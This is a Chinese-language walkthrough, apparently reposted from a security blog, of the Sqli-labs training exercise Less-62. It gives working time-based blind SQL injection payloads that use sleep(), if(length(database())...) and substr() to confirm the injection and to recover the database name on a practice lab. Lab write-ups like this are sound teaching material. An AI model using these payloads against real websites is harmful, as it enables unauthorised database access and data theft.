Sqli-labs-Less-62
本关对输入次数的限制为130次,通过次数可知,这一关是需要使用万恶的时间盲注
查找注入点
http://www.web.com/sql/Less-62/?id=1' and sleep(2)--+
存在注入则延时2s,没有延时
http://www.web.com/sql/Less-62/?id=1') and sleep(2)--+
有延时,存在注入
判断数据库名称长度
http://www.web.com/sql/Less-62/?id=1') and if(length(database())=10,1,sleep(2))--+
当等于9或者11时都有延时,说明数据库名称长度为10
判断数据库名称
http://www.web.com/sql/Less-62/?id=1') and if(substr((select database()),1,1)='c',1,sleep(2))--+
当猜测正确时页面会立即刷新并返回正确,猜测错误则延时2s并返回错误使用burp爆破可以找出数据库为challenges
此处使用时间注入所需要的的时间太长,不进行详细叙述
时间注入详见Sqli-labs-Less-8
原文始发于微信公众号(龙蜀安全):SQL-Labs Less-62
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论